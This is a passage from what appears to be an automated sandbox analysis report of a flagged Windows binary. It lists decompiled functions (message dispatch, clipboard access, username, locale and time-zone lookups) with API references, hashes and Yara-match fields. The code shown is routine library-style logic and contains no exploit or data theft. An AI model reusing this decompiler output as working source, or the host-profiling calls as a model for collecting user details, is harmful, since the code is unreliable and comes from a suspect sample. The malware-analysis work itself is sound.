									 *((intOrPtr*)(_t257 + 0x7a))(_v9);
								}
							} else {
								_t221 = _t217 - 0x40;
								if(_t221 == 0) {
									__eflags =  *((short*)(_t257 + 0x64));
									if( *((short*)(_t257 + 0x64)) != 0) {
										 *((intOrPtr*)(_t257 + 0x62))(_v9);
									}
								} else {
									_t225 = _t221 - 0x80;
									if(_t225 == 0) {
										__eflags =  *((short*)(_t257 + 0x54));
										if( *((short*)(_t257 + 0x54)) != 0) {
											 *((intOrPtr*)(_t257 + 0x52))(_v9);
										}
									} else {
										if(_t225 == 0x100) {
											__eflags =  *((short*)(_t257 + 0x8c));
											if( *((short*)(_t257 + 0x8c)) != 0) {
												 *((intOrPtr*)(_t257 + 0x8a))(_v9);
											}
										}
									}
								}
							}
							goto L78;
						}
						if(_t320 == 0) {
							__eflags =  *((short*)(_t257 + 0x74));
							if( *((short*)(_t257 + 0x74)) != 0) {
								 *((intOrPtr*)(_t257 + 0x72))(_v9);
							}
							goto L78;
						}
						if(_t172 > 0x10) {
							goto L78;
						}
						switch( *((intOrPtr*)(_t172 * 4 +  &M0045EB75))) {
							case 0:
								goto L78;
							case 1:
								__eflags =  *((short*)(__ebx + 0xa4));
								if( *((short*)(__ebx + 0xa4)) != 0) {
									__eax = _v20;
									_push(__eax);
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0xa6));
									__eax =  *((intOrPtr*)(__ebx + 0xa2))();
								}
								goto L78;
							case 2:
								__eflags =  *((short*)(__ebx + 0x44));
								if( *((short*)(__ebx + 0x44)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x46));
									__eax =  *((intOrPtr*)(__ebx + 0x42))();
								}
								goto L78;
							case 3:
								__eflags =  *((short*)(__ebx + 0x4c));
								if( *((short*)(__ebx + 0x4c)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x4e));
									__eax =  *((intOrPtr*)(__ebx + 0x4a))();
								}
								goto L78;
							case 4:
								__eflags =  *((short*)(__ebx + 0x84));
								if( *((short*)(__ebx + 0x84)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x86));
									__eax =  *((intOrPtr*)(__ebx + 0x82))();
								}
								goto L78;
							case 5:
								__eflags =  *((short*)(__ebx + 0xac));
								if( *((short*)(__ebx + 0xac)) != 0) {
									_push(__eax);
									__ecx = _v16;
									__edx = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0xae));
									__eax =  *((intOrPtr*)(__ebx + 0xaa))();
								}
								goto L78;
						}
					} else {
						E00404DCC( *((intOrPtr*)(_t257 + 0xe2)), _v16);
						if(_t318 != 0) {
							goto L16;
						}
						E00404DCC( *((intOrPtr*)(_t257 + 0xe6)), _v20);
						if(_t318 == 0) {
							L78:
							 *(_t257 + 0xde) = _v8;
							E00404A14(_t257 + 0xe2, _v16);
							E00404A14(_t257 + 0xe6, _v20);
							 *((intOrPtr*)(_t309 + 0xc)) = 0;
							L80:
							_pop(_t278);
							 *[fs:eax] = _t278;
							_push(0x45ef69);
							E004049C0( &_v280);
							return E004049E4( &_v20, 2);
						}
						goto L16;
					}
				}
			}
































                                                    0x0045e9fa
                                                    0x0045ea00
                                                    0x0045ea03
                                                    0x0045ea06
                                                    0x0045ea08
                                                    0x0045ea0c
                                                    0x0045ea0d
                                                    0x0045ea12
                                                    0x0045ea15
                                                    0x0045ea18
                                                    0x0045ea20
                                                    0x0045ef27
                                                    0x0045ef2b
                                                    0x0045ef2c
                                                    0x0045ef2d
                                                    0x0045ef33
                                                    0x0045ef34
                                                    0x0045ef39
                                                    0x00000000
                                                    0x0045ea26
                                                    0x0045ea26
                                                    0x0045ea31
                                                    0x0045ea39
                                                    0x0045ea3d
                                                    0x0045ea43
                                                    0x0045ea52
                                                    0x0045ea59
                                                    0x0045eaba
                                                    0x0045eabf
                                                    0x0045eac1
                                                    0x0045ead6
                                                    0x0045eac3
                                                    0x0045eac6
                                                    0x0045eac6
                                                    0x0045ea5b
                                                    0x0045ea60
                                                    0x0045ea62
                                                    0x0045ea64
                                                    0x0045ea66
                                                    0x0045ea68
                                                    0x0045ea6e
                                                    0x0045ea75
                                                    0x0045ea77
                                                    0x0045ea79
                                                    0x0045ea81
                                                    0x0045ea83
                                                    0x0045ea8b
                                                    0x0045ea96
                                                    0x0045eaa9
                                                    0x0045eaa9
                                                    0x0045ea45
                                                    0x0045ea48
                                                    0x0045ea48
                                                    0x0045eadf
                                                    0x0045eaf6
                                                    0x0045eafb
                                                    0x0045eafd
                                                    0x0045eb12
                                                    0x0045eaff
                                                    0x0045eb02
                                                    0x0045eb02
                                                    0x0045eae1
                                                    0x0045eae4
                                                    0x0045eae4
                                                    0x0045eb1d
                                                    0x0045eb20
                                                    0x0045eb46
                                                    0x0045eb46
                                                    0x0045eb49
                                                    0x0045eb4e
                                                    0x0045ebe6
                                                    0x0045ebeb
                                                    0x0045ec20
                                                    0x0045ec20
                                                    0x0045ec25
                                                    0x0045ece3
                                                    0x0045ece8
                                                    0x0045ecfa
                                                    0x0045ecfa
                                                    0x0045ec2b
                                                    0x0045ec2b
                                                    0x0045ec2b
                                                    0x0045ec30
                                                    0x0045edf6
                                                    0x0045edfe
                                                    0x0045ee17
                                                    0x0045ee17
                                                    0x0045ec36
                                                    0x0045ec36
                                                    0x0045ec36
                                                    0x0045ec3b
                                                    0x0045ed21
                                                    0x0045ed26
                                                    0x0045ed38
                                                    0x0045ed38
                                                    0x0045ec41
                                                    0x0045ec41
                                                    0x0045ec46
                                                    0x0045ec4c
                                                    0x0045ec51
                                                    0x0045ec5f
                                                    0x0045ec5f
                                                    0x0045ec51
                                                    0x0045ec46
                                                    0x0045ec3b
                                                    0x0045ec30
                                                    0x0045ebed
                                                    0x0045ebed
                                                    0x0045eeb8
                                                    0x0045eec0
                                                    0x0045eed1
                                                    0x0045eed1
                                                    0x0045ebf3
                                                    0x0045ebf3
                                                    0x0045ebf3
                                                    0x0045ebf8
                                                    0x0045ec67
                                                    0x0045ec6c
                                                    0x0045ec7e
                                                    0x0045ec7e
                                                    0x0045ebfa
                                                    0x0045ebfa
                                                    0x0045ebfa
                                                    0x0045ebff
                                                    0x0045ee97
                                                    0x0045ee9f
                                                    0x0045eeb0
                                                    0x0045eeb0
                                                    0x0045ec05
                                                    0x0045ec05
                                                    0x0045ec05
                                                    0x0045ec0a
                                                    0x0045eed9
                                                    0x0045eee1
                                                    0x0045eef2
                                                    0x0045eef2
                                                    0x0045ec10
                                                    0x0045ec10
                                                    0x0045ec15
                                                    0x0045ee76
                                                    0x0045ee7e
                                                    0x0045ee8f
                                                    0x0045ee8f
                                                    0x0045ee7e
                                                    0x0045ec15
                                                    0x0045ec0a
                                                    0x0045ebff
                                                    0x0045ebf8
                                                    0x0045ebed
                                                    0x00000000
                                                    0x0045ebeb
                                                    0x0045eb54
                                                    0x0045edce
                                                    0x0045edd6
                                                    0x0045edeb
                                                    0x0045edeb
                                                    0x00000000
                                                    0x0045edd6
                                                    0x0045eb5a
                                                    0x0045eb5d
                                                    0x0045ebb9
                                                    0x0045ebbc
                                                    0x0045ed5f
                                                    0x0045ed64
                                                    0x0045ed76
                                                    0x0045ed76
                                                    0x0045ebc2
                                                    0x0045ebc2
                                                    0x0045ebc5
                                                    0x0045ed02
                                                    0x0045ed07
                                                    0x0045ed19
                                                    0x0045ed19
                                                    0x0045ebcb
                                                    0x0045ebcb
                                                    0x0045ebd0
                                                    0x0045ecc4
                                                    0x0045ecc9
                                                    0x0045ecdb
                                                    0x0045ecdb
                                                    0x0045ebd6
                                                    0x0045ebdb
                                                    0x0045eda6
                                                    0x0045edae
                                                    0x0045edc3
                                                    0x0045edc3
                                                    0x0045edae
                                                    0x0045ebdb
                                                    0x0045ebd0
                                                    0x0045ebc5
                                                    0x00000000
                                                    0x0045ebbc
                                                    0x0045eb5f
                                                    0x0045ed40
                                                    0x0045ed45
                                                    0x0045ed57
                                                    0x0045ed57
                                                    0x00000000
                                                    0x0045ed45
                                                    0x0045eb68
                                                    0x00000000
                                                    0x00000000
                                                    0x0045eb6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0045ee22
                                                    0x0045ee2a
                                                    0x0045ee30
                                                    0x0045ee33
                                                    0x0045ee37
                                                    0x0045ee38
                                                    0x0045ee3b
                                                    0x0045ee3d
                                                    0x0045ee43
                                                    0x0045ee43
                                                    0x00000000
                                                    0x00000000
                                                    0x0045ec86
                                                    0x0045ec8b
                                                    0x0045ec94
                                                    0x0045ec95
                                                    0x0045ec98
                                                    0x0045ec9a
                                                    0x0045ec9d
                                                    0x0045ec9d
                                                    0x00000000
                                                    0x00000000
                                                    0x0045eca5
                                                    0x0045ecaa
                                                    0x0045ecb3
                                                    0x0045ecb4
                                                    0x0045ecb7
                                                    0x0045ecb9
                                                    0x0045ecbc
                                                    0x0045ecbc
                                                    0x00000000
                                                    0x00000000
                                                    0x0045ed7e
                                                    0x0045ed86
                                                    0x0045ed8f
                                                    0x0045ed90
                                                    0x0045ed93
                                                    0x0045ed95
                                                    0x0045ed9b
                                                    0x0045ed9b
                                                    0x00000000
                                                    0x00000000
                                                    0x0045ee4e
                                                    0x0045ee56
                                                    0x0045ee5f
                                                    0x0045ee60
                                                    0x0045ee63
                                                    0x0045ee65
                                                    0x0045ee6b
                                                    0x0045ee6b
                                                    0x00000000
                                                    0x00000000
                                                    0x0045eb22
                                                    0x0045eb2b
                                                    0x0045eb30
                                                    0x00000000
                                                    0x00000000
                                                    0x0045eb3b
                                                    0x0045eb40
                                                    0x0045eef8
                                                    0x0045eefb
                                                    0x0045ef0a
                                                    0x0045ef18
                                                    0x0045ef1f
                                                    0x0045ef3c
                                                    0x0045ef3e
                                                    0x0045ef41
                                                    0x0045ef44
                                                    0x0045ef4f
                                                    0x0045ef61
                                                    0x0045ef61
                                                    0x00000000
                                                    0x0045eb40
                                                    0x0045eb20

                                                    APIs
                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 0045EAF6
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0045EF62), ref: 0045EF34
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FromListNtdllPathProc_Window
                                                    • String ID:
                                                    • API String ID: 2126419269-0
                                                    • Opcode ID: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                    • Instruction ID: 2b1d187c4c8c1c8eaadb8a9a71d85ca4ed6e9094f5dd7d40d25eedc3d4306855
                                                    • Opcode Fuzzy Hash: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                    • Instruction Fuzzy Hash: 59E1B135A001449BDB18DF6AC489AEEB7B5AF08301F5480F6DC65DB397C7789E88CB19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004289FC Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004289FC(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x49dbf4; // 0x422ed8
					L00425F28(_t35);
				}
				E0042819C(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












                                                    0x00428a05
                                                    0x00428a0e
                                                    0x00428a12
                                                    0x00428a14
                                                    0x00428a19
                                                    0x00428a19
                                                    0x00428a20
                                                    0x00428a25
                                                    0x00428a30
                                                    0x00428a3d
                                                    0x00428a48
                                                    0x00428a51
                                                    0x00428a54
                                                    0x00428a5a
                                                    0x00428a6a
                                                    0x00428a7c

                                                    APIs
                                                    • GetClipboardData.USER32 ref: 00428A09
                                                    • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00428A2B
                                                    • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00428A3D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileMeta$ClipboardCopyDataHeader
                                                    • String ID:
                                                    • API String ID: 1752724394-0
                                                    • Opcode ID: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                    • Instruction ID: 0727d7d259e4847e38e41a473cb046f23bcddc174ccbaa46af5af426c499999d
                                                    • Opcode Fuzzy Hash: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                    • Instruction Fuzzy Hash: 5D117C71B003008FC710DFAED881A9ABBF8AF05310F10457EE909DB292DA74EC058B99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458EA4 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458EA4() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x49ebc8 = GetCurrentThreadId();
				L5:
				_t5 =  *0x49ebcc; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x49ebb8 != 0 &&  *((intOrPtr*)( *0x49ebb8 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E004397F4( &_v12) == 0) {
							E0045B3A8( *0x49ebb8);
						}
					}
					goto L5;
				}
				return _t6;
			}






                                                    0x00458eb5
                                                    0x00458ee5
                                                    0x00458ee7
                                                    0x00458eed
                                                    0x00458ef7
                                                    0x00458ebf
                                                    0x00458ecd
                                                    0x00458edc
                                                    0x00458ee0
                                                    0x00458ee0
                                                    0x00458edc
                                                    0x00000000
                                                    0x00458ebf
                                                    0x00458efd

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458EB0
                                                    • GetCursorPos.USER32(?,00000000,00000064), ref: 00458ECD
                                                    • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00458EED
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentCursorObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 1359611202-0
                                                    • Opcode ID: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                    • Instruction ID: 5466cc4fe75e799d867a24ddfff030feada42c46f86c6fe88e2ad44c126da2fb
                                                    • Opcode Fuzzy Hash: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                    • Instruction Fuzzy Hash: 50F054315082049BDB14EB5AD887B5633A8EB14316F50017FE911E62D2DF7EA849C61E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00472E58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00472E58(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				long _v12;
				void* _t26;
				intOrPtr _t35;
				void* _t39;

				_v8 = 0;
				_t26 = __eax;
				_push(_t39);
				_push(0x472ed2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff8;
				_v12 = 0xff;
				E0040500C( &_v8, _v12);
				if(GetUserNameA(E00404E80(_v8),  &_v12) == 0) {
					E00404A14(_t26, "Unknown");
				} else {
					E00404EE0(_v8, _v12 - 1, 1, _t26);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(0x472ed9);
				return E004049C0( &_v8);
			}








                                                    0x00472e61
                                                    0x00472e64
                                                    0x00472e68
                                                    0x00472e69
                                                    0x00472e6e
                                                    0x00472e71
                                                    0x00472e74
                                                    0x00472e81
                                                    0x00472e9a
                                                    0x00472eb7
                                                    0x00472e9c
                                                    0x00472ea9
                                                    0x00472ea9
                                                    0x00472ebe
                                                    0x00472ec1
                                                    0x00472ec4
                                                    0x00472ed1

                                                    APIs
                                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00472E93
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID: Unknown
                                                    • API String ID: 2645101109-1654365787
                                                    • Opcode ID: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                    • Instruction ID: 0e574cec38e77eee5c3ac86c404587bc9d0c2a183e22f9869122a41002a7b21b
                                                    • Opcode Fuzzy Hash: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                    • Instruction Fuzzy Hash: C2016770A04508ABDB00DBA6DD4199EB7E9EB88304F61817AA504E3691D778AE01955D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044083C Relevance: 3.1, APIs: 2, Instructions: 63windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044083C(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0044078C(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x49dbcc; // 0x49ebb8
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = L004519E0(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E0043C130(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}










                                                    0x00440842
                                                    0x00440845
                                                    0x00440857
                                                    0x004408b5
                                                    0x004408c5
                                                    0x004408d4
                                                    0x00000000
                                                    0x004408db
                                                    0x004408ca
                                                    0x004408d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00440886
                                                    0x00440886
                                                    0x00440890
                                                    0x00000000
                                                    0x00440892
                                                    0x00440894
                                                    0x00440899
                                                    0x0044089d
                                                    0x00000000
                                                    0x0044089f
                                                    0x004408ac
                                                    0x004408b3
                                                    0x00000000
                                                    0x00000000
                                                    0x004408b3
                                                    0x0044089d
                                                    0x00440890
                                                    0x004408e2

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CaptureIconic
                                                    • String ID:
                                                    • API String ID: 2277910766-0
                                                    • Opcode ID: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                    • Instruction ID: 1854ad3725da6f9c39b561de1c6dc083fd0ae92529cbbd4a26d730481ff8a107
                                                    • Opcode Fuzzy Hash: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                    • Instruction Fuzzy Hash: C2114231B00205DBFB24FF59C685AAAB3F4AF04304B24407AF504EB352DB38ED549B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040E088 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E0040E088(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40e0ec);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E00404C30( &_v16, 7,  &_v11);
				_push(_v16);
				E00409664(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040E0F3);
				return E004049C0( &_v16);
			}








                                                    0x0040e088
                                                    0x0040e091
                                                    0x0040e096
                                                    0x0040e097
                                                    0x0040e09c
                                                    0x0040e09f
                                                    0x0040e0ae
                                                    0x0040e0be
                                                    0x0040e0c6
                                                    0x0040e0cf
                                                    0x0040e0d8
                                                    0x0040e0db
                                                    0x0040e0de
                                                    0x0040e0eb

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0AE
                                                    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0C7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                    • Instruction ID: 7c6682d932fdf235f30c9e422d46d0a378ce0b1a8e98ecff7cc19f77d6cd180e
                                                    • Opcode Fuzzy Hash: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                    • Instruction Fuzzy Hash: DCF0F671E08308ABEB00EBB2C85298EB3AEE7C4714F50C97AB110A36C1DA7C65018659
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047E020 Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E0047E020(signed int __ebx, void* __ecx, void* __esi, long long __fp0) {
				long long _v12;
				struct _TIME_ZONE_INFORMATION _v184;
				char _v188;
				char _v192;
				void* _t29;
				intOrPtr _t30;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				signed int _t55;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				void* _t78;
				long long _t86;

				_t86 = __fp0;
				_t55 = __ebx;
				_push(__ebx);
				_v192 = 0;
				_v188 = 0;
				_push(_t78);
				_push(0x47e133);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffff44;
				_t29 = GetTimeZoneInformation( &_v184) - 0xffffffff;
				if(_t29 == 0) {
					_t30 =  *0x49dde0; // 0x47a56c
					E00406A70(_t30,  &_v188);
					_t66 = 1;
					E0040D144(_v188, 1);
					E00404378();
				} else {
					_t48 = _t29 - 1;
					if(_t48 == 0) {
						_t55 = _v184.Bias;
					} else {
						_t49 = _t48 - 1;
						if(_t49 == 0) {
							_t55 = _v184.Bias + _v184.StandardBias;
						} else {
							_t83 = _t49 == 1;
							if(_t49 == 1) {
								_t55 = _v184.Bias + _v184.DaylightBias;
							} else {
								_t51 =  *0x49dde0; // 0x47a56c
								E00406A70(_t51,  &_v192);
								_t66 = 1;
								E0040D144(_v192, 1);
								E00404378();
							}
						}
					}
				}
				_push(0);
				asm("cdq");
				_t60 = (_t55 ^ _t66) - _t66;
				asm("cdq");
				_push(((_t55 ^ _t66) - _t66) % 0x3c);
				asm("cdq");
				asm("cdq");
				_pop(_t70);
				E0040AF70(_t60 / 0x3c, 0, _t70, _t83, _t86);
				_v12 = _t86;
				asm("wait");
				if(_t55 > 0) {
					_v12 =  *0x47e144 - _v12;
					asm("wait");
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x47e13a);
				return E004049E4( &_v192, 2);
			}


















                                                    0x0047e020
                                                    0x0047e020
                                                    0x0047e029
                                                    0x0047e02d
                                                    0x0047e033
                                                    0x0047e03b
                                                    0x0047e03c
                                                    0x0047e041
                                                    0x0047e044
                                                    0x0047e053
                                                    0x0047e056
                                                    0x0047e069
                                                    0x0047e06e
                                                    0x0047e079
                                                    0x0047e080
                                                    0x0047e085
                                                    0x0047e058
                                                    0x0047e058
                                                    0x0047e059
                                                    0x0047e08c
                                                    0x0047e05b
                                                    0x0047e05b
                                                    0x0047e05c
                                                    0x0047e0a5
                                                    0x0047e05e
                                                    0x0047e05e
                                                    0x0047e05f
                                                    0x0047e09a
                                                    0x0047e061
                                                    0x0047e0b0
                                                    0x0047e0b5
                                                    0x0047e0c0
                                                    0x0047e0c7
                                                    0x0047e0cc
                                                    0x0047e0cc
                                                    0x0047e05f
                                                    0x0047e05c
                                                    0x0047e059
                                                    0x0047e0d1
                                                    0x0047e0d5
                                                    0x0047e0da
                                                    0x0047e0e3
                                                    0x0047e0e6
                                                    0x0047e0e9
                                                    0x0047e0f5
                                                    0x0047e0fa
                                                    0x0047e0fb
                                                    0x0047e100
                                                    0x0047e103
                                                    0x0047e106
                                                    0x0047e111
                                                    0x0047e114
                                                    0x0047e114
                                                    0x0047e117
                                                    0x0047e11a
                                                    0x0047e11d
                                                    0x0047e132

                                                    APIs
                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,0047E133,?,?,?,?,0047DC8D,?,00000000,0047DCD5), ref: 0047E04E
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InformationLoadStringTimeZone
                                                    • String ID:
                                                    • API String ID: 2315373741-0
                                                    • Opcode ID: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                    • Instruction ID: c8d3901693a79c185cc961f03ab4e0d83d179c54252409d0c18e91a2dd9ec5b1
                                                    • Opcode Fuzzy Hash: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                    • Instruction Fuzzy Hash: 6A318670B043148BD714DF26DC81BA9B776EB48304F0482FAE50DE3291DB799D54CB1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042F60C Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E0042F60C(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00407540();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42f646);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				L00403DE8(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








                                                    0x0042f615
                                                    0x0042f618
                                                    0x0042f61a
                                                    0x0042f620
                                                    0x0042f664
                                                    0x0042f668
                                                    0x0042f669
                                                    0x0042f66d
                                                    0x0042f670
                                                    0x0042f671
                                                    0x0042f676
                                                    0x00000000
                                                    0x0042f676
                                                    0x0042f625
                                                    0x0042f62a
                                                    0x0042f62d
                                                    0x0042f637
                                                    0x0042f63e
                                                    0x0042f641
                                                    0x00000000

                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F671
                                                    Memory Dump Source
